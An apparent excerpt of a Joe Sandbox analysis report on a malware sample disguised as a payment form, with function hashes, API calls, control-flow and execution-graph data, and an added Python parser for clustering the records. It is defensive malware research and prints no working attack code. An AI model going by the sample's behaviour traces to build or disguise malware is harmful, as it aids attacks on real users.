                                              • Instruction ID: dc294af65d60d65b3c908f17b1f144ae08a122384e53eecbe961cad1ba604c9a
                                              • Opcode Fuzzy Hash: fa0c41d88c38d944c9f80a300fac1b2c7f777eb2ab4d9872b8f7e11d16377a81
                                              • Instruction Fuzzy Hash: 251153B6800209CFDB10DFA9C945BEEBBF5EF48310F24881AE519A7250CB799944CBA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 8b32b7f1aaa5f7d6f72828c7097d2529128d1b5923095987e1a1a8893bc5a87a
                                              • Instruction ID: aa12c5a9d7d582f082c10bf25d478c85a180902654c34334db6631d5223bd10b
                                              • Opcode Fuzzy Hash: 8b32b7f1aaa5f7d6f72828c7097d2529128d1b5923095987e1a1a8893bc5a87a
                                              • Instruction Fuzzy Hash: 33116A71C103498FDB10DFAAC4447DEFBF4EF48310F248419D519A7240CB79A944CBA4

                                              Control-flow Graph

                                              control_flow_graph 240 260aef3-260af38 241 260af40-260af6b GetModuleHandleW 240->241 242 260af3a-260af3d 240->242 243 260af74-260af88 241->243 244 260af6d-260af73 241->244 242->241 244->243
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0260AF5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: cd1212435b1c5206119e073d1883a55b529db556e824a15637ebc7dc7454d8b3
                                              • Instruction ID: fd2809e4d4d76769cdfbb6ce733bb3efd32b9ee908be6e5cb6d84d6381cdecaa
                                              • Opcode Fuzzy Hash: cd1212435b1c5206119e073d1883a55b529db556e824a15637ebc7dc7454d8b3
                                              • Instruction Fuzzy Hash: 4A1102B6C003498FDB14CF9AC584ADFFBF4EB48214F10845AD519A7740D379A546CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A9BEFD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 3870399fc71407513e508b1175d9fa53c05c3caccf15523c6f807989d6327b62
                                              • Instruction ID: 30a7dd415c68288ac45ae01854bb20558f4fb9836e894f0d46ffddf92b6d8e5b
                                              • Opcode Fuzzy Hash: 3870399fc71407513e508b1175d9fa53c05c3caccf15523c6f807989d6327b62
                                              • Instruction Fuzzy Hash: 0C1122B58003489FDB10DF9AD884BDFBBF8EB48320F20845AE918A7200D375A944CFB0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 7f0d4f4c5370960ad795c5e3262a27e37d7d76ff34df03f7326417a3fa99acbd
                                              • Instruction ID: 651b96300b1b73493347c41c71261e9dd9b3987ece3a97a0d19a9914d8151b97
                                              • Opcode Fuzzy Hash: 7f0d4f4c5370960ad795c5e3262a27e37d7d76ff34df03f7326417a3fa99acbd
                                              • Instruction Fuzzy Hash: 771166B5C103498FDB10DFAAC4457EEFBF4AF48210F24881AD519A7240CB79A944CBA0
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0260AF5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 10dd681ec3c503258f93b3034c7e32650514ec93747671e53953468ac9c41bab
                                              • Instruction ID: 9a43c21fe7a2242ae6b60a348dc3ab280c400667baa637992e699bcbaced37e3
                                              • Opcode Fuzzy Hash: 10dd681ec3c503258f93b3034c7e32650514ec93747671e53953468ac9c41bab
                                              • Instruction Fuzzy Hash: A2110FB6C003498FDB14CF9AC544A9FFBF4EB88214F10846AD918A7340D379A945CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A9BEFD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 8aec5029c4904354cc01113c3e2ebc6506403300cc4d63be0ebfbde536db6b3f
                                              • Instruction ID: 86afb3d253bb6d7bb4397d75a38a1deab6d65b3236086ad9b1ca486d17510e5f
                                              • Opcode Fuzzy Hash: 8aec5029c4904354cc01113c3e2ebc6506403300cc4d63be0ebfbde536db6b3f
                                              • Instruction Fuzzy Hash: 1A1133B5800348DFDB10CF99D584BDEBBF8EB08314F20881AD958B7600D375A544CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aafa9d929158b3db3efbe3cabc91bd151d83a041b2e3968647726bde860124c1
                                              • Instruction ID: 482ba88b09e59d1aa8f1a3f494be62b37d677421f9de55c995c12b4b467fc77e
                                              • Opcode Fuzzy Hash: aafa9d929158b3db3efbe3cabc91bd151d83a041b2e3968647726bde860124c1
                                              • Instruction Fuzzy Hash: 4721037A900240DFDB45DF18D9C0B27BB65FB88318F34C57EE90A0B256C336D456CAA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 186a8c7e2e8f3938f241d2c5dc35aad0ceb516101500ae95f2253a098fc0c7ba
                                              • Instruction ID: d832418d7067d7978cc2c864b50ff0000ce13e7a039fb052b1bbf989fc70327f
                                              • Opcode Fuzzy Hash: 186a8c7e2e8f3938f241d2c5dc35aad0ceb516101500ae95f2253a098fc0c7ba
                                              • Instruction Fuzzy Hash: 2821F479900244DFDB48DF18D9C0B26BB65FB84314F34C17EDA0A4B256C336E456CAA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414170215.00000000024DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24dd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc0cbc05f7142686fc870dd7c75bd0a4ae1be7d628172753f682d58512d76f9b
                                              • Instruction ID: 97bdb22a48d4dc276c1a52508b795af6e06ff8b07afb112a7059f5d913fe3d97
                                              • Opcode Fuzzy Hash: fc0cbc05f7142686fc870dd7c75bd0a4ae1be7d628172753f682d58512d76f9b
                                              • Instruction Fuzzy Hash: 2821D372904344DFDB15DF14D9D0B16BB65EB84218F64C56AD80A4B386C336D447CA61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414170215.00000000024DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24dd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c25f75c3692e0c455259b073395a5738aacc402750dea8c250576cad83cbc78
                                              • Instruction ID: 4cde33b7cc68f4c28b08c59a610fbcef1973c11a6d2f1443cd1c812351175242
                                              • Opcode Fuzzy Hash: 7c25f75c3692e0c455259b073395a5738aacc402750dea8c250576cad83cbc78
                                              • Instruction Fuzzy Hash: 3A21D472A04344EFDB05DF50D9D0B26BBA5FB88314F24C5AEE84A4F392C736D846CA61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414170215.00000000024DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24dd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74a105c1a995c441dc1684fe4a009bfe3bf55dc3a2e2349498389e7269ca830
                                              • Instruction ID: 0540bf519f5c02064d57aa5ac9e2d1a34476f2a7d6286b576b56b7590b2dcb0f
                                              • Opcode Fuzzy Hash: c74a105c1a995c441dc1684fe4a009bfe3bf55dc3a2e2349498389e7269ca830
                                              • Instruction Fuzzy Hash: 6E217175508380DFCB06CF24D994712BF71EB86214F28C5DBD8498F2A7C33A9846CB62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: cca06e303552b6a203859ee2f8e97cb2d89a39905d869e7f6a368b2fca87f45d
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 4C11AF76904240DFCB15CF14D9C4B56BF71FB84324F24C6AED9094B656C33AE456CBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: cba9d679b54e2f1b33624f877a3b090da9218b009e6ab624a19e06ae1fd039e7
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 57116D76904280DFCB15CF14D9C4B56BF61FB84218F2486AAD8494B656C336D456CBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414170215.00000000024DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24dd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: dfaf25f1a7ab6911b281e6a7ce60a6b2920109bb642c03e41baa7460502bb38f
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: 08118B76904280DFCB15CF50D5D4B16BBB1FB84218F28C6AAD8494F796C33AD44ACB61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df9ce4edbde97e026c121d06c0de4ec2a65df5b1c5b778c294db2eefa0549fa9
                                              • Instruction ID: e708010e0e10e99f41067dcf0f8fad05d3c8587ac1e420a9dc084b89375daff5
                                              • Opcode Fuzzy Hash: df9ce4edbde97e026c121d06c0de4ec2a65df5b1c5b778c294db2eefa0549fa9
                                              • Instruction Fuzzy Hash: D401A735905B40DBE7505B19CD84B67FBD8DF41624F28847FED094A386D7799840C672
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8cc0516a09ea10242963c528570f98163ae10ea9c10cb74b839b6c3246ac7db5
                                              • Instruction ID: fd785afc949adee95a49240bc407fe402b22b66bb0f40b2e612aacd086e6033f
                                              • Opcode Fuzzy Hash: 8cc0516a09ea10242963c528570f98163ae10ea9c10cb74b839b6c3246ac7db5
                                              • Instruction Fuzzy Hash: DCF0C235405740EEE7108A0ACD84B63FBA8EF40624F28C46BED480A386C3799844CAB1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *E5p
                                              • API String ID: 0-1789816039
                                              • Opcode ID: eddde117592aeb3f1d7aa4cddbb3c7298fcdb3fdc6b31faa048dbe03d2984a1c
                                              • Instruction ID: faa953464a7259774f3a3f88444488f5cd5789bffde1a50d54ab1d38bfae27a2
                                              • Opcode Fuzzy Hash: eddde117592aeb3f1d7aa4cddbb3c7298fcdb3fdc6b31faa048dbe03d2984a1c
                                              • Instruction Fuzzy Hash: 10E1F774E102598FDB14EFA9C580AAEFBF2BF89305F248169D418AB355D731AD41CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0bdbeec0b04c76356818e94898d1e0d91663c42adfb5a554709d336d6f39f2aa
                                              • Instruction ID: 69c911f14db882e8ebf8ad9d716b404058bb07879e2e744c0294796d5228631f
                                              • Opcode Fuzzy Hash: 0bdbeec0b04c76356818e94898d1e0d91663c42adfb5a554709d336d6f39f2aa
                                              • Instruction Fuzzy Hash: D0E1F674E102598FDB14EFA9C581AAEFBF2BF89305F24C169D414AB355DB30A941CF60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f93180b1a5cb8844d26e8bbe41cc61c5495a3319ffa9770b08d654ab26283d7
                                              • Instruction ID: 580112942ccffb4b247516db854912e9c1372562dce5e249064cbadee5519638
                                              • Opcode Fuzzy Hash: 5f93180b1a5cb8844d26e8bbe41cc61c5495a3319ffa9770b08d654ab26283d7
                                              • Instruction Fuzzy Hash: 45E1F874E002598FDB54DFA9C581AAEFBF2BF89305F248169D418AB355DB30AD41CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 813d423f1def1e18d1fda8313b30704edd4e23931b1ec595bf7644ff1c658cf7
                                              • Instruction ID: 6d2ae43de43d2f1cede17f51776cec88f6e3df8f35ed91e246bf48dc9f206415
                                              • Opcode Fuzzy Hash: 813d423f1def1e18d1fda8313b30704edd4e23931b1ec595bf7644ff1c658cf7
                                              • Instruction Fuzzy Hash: 49E1E874E102598FDB54DFA9C580AAEFBF2BF89305F248169D414AB356DB30AD41CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b59c3dfc863daf7c4530711b3f52beba92fea317cfbd2bc1a2fa669c3ee59f0f
                                              • Instruction ID: 9815250699506f3b784578a59246f48d890ec34acbe34f9060ad92954fe826df
                                              • Opcode Fuzzy Hash: b59c3dfc863daf7c4530711b3f52beba92fea317cfbd2bc1a2fa669c3ee59f0f
                                              • Instruction Fuzzy Hash: C1E10674E002598FDB14DFA9C581AAEFBF2BF89305F248169D408AB355DB31AD41CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6e8bf5de987f7cb8276562b2133e6fd342b9a7b1ccc81f1d63831d673664089
                                              • Instruction ID: 8caba79f2a73e2f130c40a19ee12044fe27298afa9f7bc962e1810ab5886aec3
                                              • Opcode Fuzzy Hash: c6e8bf5de987f7cb8276562b2133e6fd342b9a7b1ccc81f1d63831d673664089
                                              • Instruction Fuzzy Hash: 42A15F36A002058FCF29DFB4D88099EB7B2FF85304B1585A9E805AB6A1DF75ED16DF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 98465763f7e55fa17d72df825963678d658e0f6f23ed0d293bf038f7c5136381
                                              • Instruction ID: 864f0376ef1aabb9c580868fb51aa967e8df2c51c04227f7c1a6a4fbe34c5c8b
                                              • Opcode Fuzzy Hash: 98465763f7e55fa17d72df825963678d658e0f6f23ed0d293bf038f7c5136381
                                              • Instruction Fuzzy Hash: 6B510874E102198FDB18DFA9C9815AEFBF2BF89305F24C56AD418AB315DB319941CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03034220ebf2b684e702f514f953dc0a238972e1a7de965ef2da7568a33dde6d
                                              • Instruction ID: 4296aaae9477dc9e933d0579a1ae93af00885beb85e64d4ed67ed4808dcec0f7
                                              • Opcode Fuzzy Hash: 03034220ebf2b684e702f514f953dc0a238972e1a7de965ef2da7568a33dde6d
                                              • Instruction Fuzzy Hash: 44F01283880EAE83DB2591B75CE42CEA780E76757CF695355D378023E2BFA0D153D245
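
The records above are the per-function output of the Joe Sandbox IDA plugin: a memory-dump source, the resolved API calls (where any were found), and a Similarity block of Opcode ID, Instruction ID and their fuzzy variants. Two of the records for the 024CD000 dump carry the same Opcode ID (f4ddf6aa…) with different Instruction IDs, and the records for the 02600000 and 06A90000 dumps resolve GetModuleHandleW and PostMessageW respectively. Pulling such pairs out and indexing resolved APIs by dump is the kind of pass an analyst runs over these records before comparing with other samples. The following parser is an added example written for this page; it is not part of the Joe Sandbox report or product. The record layout is taken from the text above, and the sample input is a three-record excerpt copied from it.

```python
"""Parse the per-function 'Similarity' records printed by the Joe Sandbox IDA
plugin (layout as reproduced in the report above) and cluster them by Opcode ID.
Added example; not part of the Joe Sandbox report or product."""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Sample input: three records excerpted verbatim from the report above.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0260AF5E
Memory Dump Source
• Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 10dd681ec3c503258f93b3034c7e32650514ec93747671e53953468ac9c41bab
• Instruction ID: 9a43c21fe7a2242ae6b60a348dc3ab280c400667baa637992e699bcbaced37e3
• Opcode Fuzzy Hash: 10dd681ec3c503258f93b3034c7e32650514ec93747671e53953468ac9c41bab
• Instruction Fuzzy Hash: A2110FB6C003498FDB14CF9AC544A9FFBF4EB88214F10846AD918A7340D379A945CFA1
Memory Dump Source
• Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
• Instruction ID: cca06e303552b6a203859ee2f8e97cb2d89a39905d869e7f6a368b2fca87f45d
• Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
• Instruction Fuzzy Hash: 4C11AF76904240DFCB15CF14D9C4B56BF71FB84324F24C6AED9094B656C33AE456CBA1
Memory Dump Source
• Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
• Instruction ID: cba9d679b54e2f1b33624f877a3b090da9218b009e6ab624a19e06ae1fd039e7
• Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
• Instruction Fuzzy Hash: 57116D76904280DFCB15CF14D9C4B56BF61FB84218F2486AAD8494B656C336D456CBA1
"""

# Shape of an 'APIs' bullet in the report: "Name.MODULE(args), ref: address".
API_LINE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\(.*\), ref: (?P<ref>[0-9A-Fa-f]+)$")
OFFSET = re.compile(r"Offset: (?P<offset>[0-9A-Fa-f]+)")


def parse_records(text: str) -> List[dict]:
    """One dict per function record. A record is closed by its 'Instruction Fuzzy
    Hash' bullet, the last field the plugin prints; un-bulleted lines are section
    labels, and the 'APIs' label switches the bullets that follow into API mode."""
    records, current, section = [], {"apis": []}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_LINE.match(body)
            if m:
                current["apis"].append(m.groupdict())
            continue
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":  # keep the dump base offset as its own field
            m = OFFSET.search(value)
            current["offset"] = m.group("offset") if m else ""
        current[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(current)
            current, section = {"apis": []}, ""
    return records


def shared_opcode_ids(records: List[dict]) -> Dict[str, List[str]]:
    """Opcode IDs that occur in more than one record, mapped to the Instruction IDs
    of those records (same opcode sequence, different instruction bytes)."""
    by_opcode: Dict[str, List[str]] = defaultdict(list)
    for r in records:
        if r.get("Opcode ID"):
            by_opcode[r["Opcode ID"]].append(r["Instruction ID"])
    return {k: v for k, v in by_opcode.items() if len(v) > 1}


def apis_by_dump(records: List[dict]) -> Dict[str, Set[str]]:
    """Resolved API names grouped by the base offset of the dump they came from."""
    out: Dict[str, Set[str]] = defaultdict(set)
    for r in records:
        for api in r["apis"]:
            out[r["offset"]].add(api["name"])
    return dict(out)
```

Run on the full record list, shared_opcode_ids() gives the clusters worth diffing against other Remcos samples, and apis_by_dump() shows which injected region (02600000, 06A90000, 024CD000 ...) resolved which imports; the 024CD000 records above resolve none, so they surface only through their hashes.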

                                              Execution Graph

                                               Execution Coverage: 1.9%
                                               Dynamic/Decrypted Code Coverage: 0%
                                               Signature Coverage: 2%
                                               Total number of Nodes: 748
                                               Total number of Limit Nodes: 19
                                               [Execution graph: rendered interactively in the original report; the raw node and edge list is not reproduced here. API calls labelled on the graph's nodes include LoadLibraryA/GetProcAddress, IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter/UnhandledExceptionFilter, GetCurrentProcess/TerminateProcess, EnterCriticalSection/LeaveCriticalSection, RtlAllocateHeap, RaiseException, CreateMutexA/GetLastError, OpenMutexA, WaitForSingleObject/CloseHandle, GetModuleFileNameW, RegOpenKeyExA/RegQueryValueExA/RegCloseKey, CreateProcessA and CreateThread.]
46128->46755 46132 40dc39 CreateThread 46129->46132 46130->45979 46758 411140 38 API calls ___scrt_fastfail 46130->46758 46132->46102 46759 401bc9 49 API calls _strftime 46132->46759 46133 40dc8b 46473 40b0a3 7 API calls 46133->46473 46135->45850 46136->45854 46137->45859 46138->45857 46143->45877 46144->45879 46145->45882 46146->45884 46148 4328dc GetStartupInfoW 46147->46148 46148->45888 46150 44c24b 46149->46150 46151 44c242 46149->46151 46150->45891 46154 44c138 48 API calls 4 library calls 46151->46154 46153->45891 46154->46150 46156 41a919 LoadLibraryA GetProcAddress 46155->46156 46157 41a909 GetModuleHandleA GetProcAddress 46155->46157 46158 41a947 GetModuleHandleA GetProcAddress 46156->46158 46159 41a937 GetModuleHandleA GetProcAddress 46156->46159 46157->46156 46160 41a973 24 API calls 46158->46160 46161 41a95f GetModuleHandleA GetProcAddress 46158->46161 46159->46158 46160->45896 46161->46160 46480 419493 FindResourceA 46162->46480 46165 439adb _Yarn 21 API calls 46166 40ddad _Yarn 46165->46166 46483 402097 46166->46483 46169 401fc2 28 API calls 46170 40ddd3 46169->46170 46171 401fb8 11 API calls 46170->46171 46172 40dddc 46171->46172 46173 439adb _Yarn 21 API calls 46172->46173 46174 40dded _Yarn 46173->46174 46489 4062ee 46174->46489 46176 40de20 46176->45898 46178 4020ec 46177->46178 46179 4023ae 11 API calls 46178->46179 46180 402106 46179->46180 46181 402549 28 API calls 46180->46181 46182 402114 46181->46182 46182->45901 46541 4020bf 46183->46541 46185 419e0a 46186 401fb8 11 API calls 46185->46186 46187 419e3c 46186->46187 46188 401fb8 11 API calls 46187->46188 46190 419e44 46188->46190 46189 419e0c 46547 404182 28 API calls 46189->46547 46193 401fb8 11 API calls 46190->46193 46195 40d43c 46193->46195 46194 419e18 46196 401fc2 28 API calls 46194->46196 46205 40e563 46195->46205 46198 419e21 46196->46198 46197 401fc2 28 API calls 46204 419d9a 46197->46204 46199 401fb8 11 API calls 46198->46199 46201 419e29 46199->46201 46200 401fb8 11 API calls 
